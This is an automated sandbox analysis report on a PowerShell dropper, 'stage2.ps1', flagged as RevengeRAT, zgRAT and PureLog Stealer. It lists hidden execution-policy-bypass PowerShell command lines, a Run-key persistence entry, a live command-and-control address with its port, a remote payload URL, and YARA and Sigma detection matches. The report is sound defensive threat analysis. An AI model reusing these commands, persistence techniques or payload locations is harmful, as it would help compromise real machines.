
Windows Analysis Report
stage2.ps1

Overview

General Information

Sample name: stage2.ps1
Analysis ID: 1572999
MD5: 86668391bf87240f9b512f7f56e2f4ec
SHA1: b67f1b89d2b5fe4d3121052ad1208211214aa293
SHA256: f666ce7cd0fcb4bf2718c9fb6edcbd825bedae8fd57374931c82a7866975f37d
Tags: ps1, user-mossdinger

Detection

PureLog Stealer, RevengeRAT, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RevengeRAT
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates autostart registry keys with suspicious names
Found RAT behaviour (information extraction to be send to C&C)
Injects a PE file into a foreign processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 7820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8172 cmdline: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8188 cmdline: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 3020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cmd.exe (PID: 3332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2492 cmdline: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1720 cmdline: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 3156 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
zgRAT | zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer component that targets browser information and crypto wallets. It usually spreads via USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"Host": ["102.165.46.145"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "pHXJvbCGPPiC", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}
Source | Rule | Description | Author | Strings
stage2.ps1 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security |
00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown |
  • 0x2e08:$a1: Revenge-RAT
  • 0x2f34:$a2: SELECT * FROM FirewallProduct
  • 0x2e6e:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x23d6:$a4: get_MachineName
0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security |
0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown |
  • 0x2e08:$a1: Revenge-RAT
  • 0x2f34:$a2: SELECT * FROM FirewallProduct
  • 0x2e6e:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x23d6:$a4: get_MachineName
00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(15 further entries omitted)

Source | Rule | Description | Author | Strings
2.2.csc.exe.400000.0.unpack | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security |
15.2.csc.exe.400000.0.unpack | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security |
10.2.csc.exe.400000.0.unpack | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security |
2.2.csc.exe.400000.0.unpack | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown |
  • 0x3008:$a1: Revenge-RAT
  • 0x3134:$a2: SELECT * FROM FirewallProduct
  • 0x306e:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x25d6:$a4: get_MachineName
15.2.csc.exe.400000.0.unpack | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown |
  • 0x3008:$a1: Revenge-RAT
  • 0x3134:$a2: SELECT * FROM FirewallProduct
  • 0x306e:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x25d6:$a4: get_MachineName
(22 further entries omitted)

Source | Rule | Description | Author | Strings
amsi64_7548.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

                    System Summary

Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\ProgramData\PDF\1.bat
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", CommandLine: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8172, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", ProcessId: 8188, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", ProcessId: 7548, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\PDF\1.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\D
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\ProgramData\PDF\1.bat
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", ProcessId: 7548, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\ProgramData\PDF\PDF2.ps1

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-11T11:25:47.326095+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:26:17.341478+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:26:47.356218+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:26:50.966752+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:00.231888+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:00.351303+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:16.419352+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:24.841118+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:04.185052+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:32.106992+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:34.028762+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:47.685524+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:50.653807+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:29:04.202633+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-11T11:25:17.321307+0100 | 2841113 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP


                    AV Detection

Source: 2.2.csc.exe.400000.0.unpack | Malware Configuration Extractor: RevengeRAT {"Host": ["102.165.46.145"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "pHXJvbCGPPiC", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}
Source: stage2.ps1 | Virustotal: Detection: 12%
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown | HTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: C:\Users\pc\Desktop\RevengeRAT C# Stub\Lime\obj\Debug\Lime.pdb | source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: ClassLibrary1.pdb | source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ClassLibrary1.pdb8 | source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4x nop then jmp 05762730h | 2_2_05762639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-3Ch] | 2_2_05762BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4x nop then jmp 0576A7A1h | 2_2_05769A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-3Ch] | 2_2_05762BE8

                    Networking

Source: Network traffic | Suricata IDS: 2841113 - Severity 1 - ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4 : 192.168.2.4:49733 -> 102.165.46.145:333
Source: Network traffic | Suricata IDS: 2035885 - Severity 1 - ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 : 192.168.2.4:49733 -> 102.165.46.145:333
Source: global traffic | TCP traffic: 192.168.2.4:49733 -> 102.165.46.145:333
Source: global traffic | HTTP traffic detected (3 identical entries):
  GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
  Host: res.cloudinary.com
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 151.101.1.137
Source: Joe Sandbox View | ASN Name: RAINBOW-HKRainbownetworklimitedHK
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 102.165.46.145 (50 identical entries)
Source: global traffic | HTTP traffic detected (3 identical entries):
  GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
  Host: res.cloudinary.com
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: res.cloudinary.com
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cloudinary.map.fastly.net
Source: powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://res.cloudinary.com
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6C67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7A14000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B793B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn
Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6C67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7667000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B793B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C66EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C60EE000.00000004.00000800.00020000.00000000.sdmp, stage2.ps1, PDF2.ps1.0.dr | String found in binary or memory: https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49739 version: TLS 1.2

                    E-Banking Fraud

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR

                    System Summary

                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE | Matched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE | Matched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects zgRAT Author: ditekSHen
                    Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process Stats: CPU usage > 49%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B8890D3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 2_2_05767C50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 2_2_057674A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 2_2_05766678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 2_2_05766128
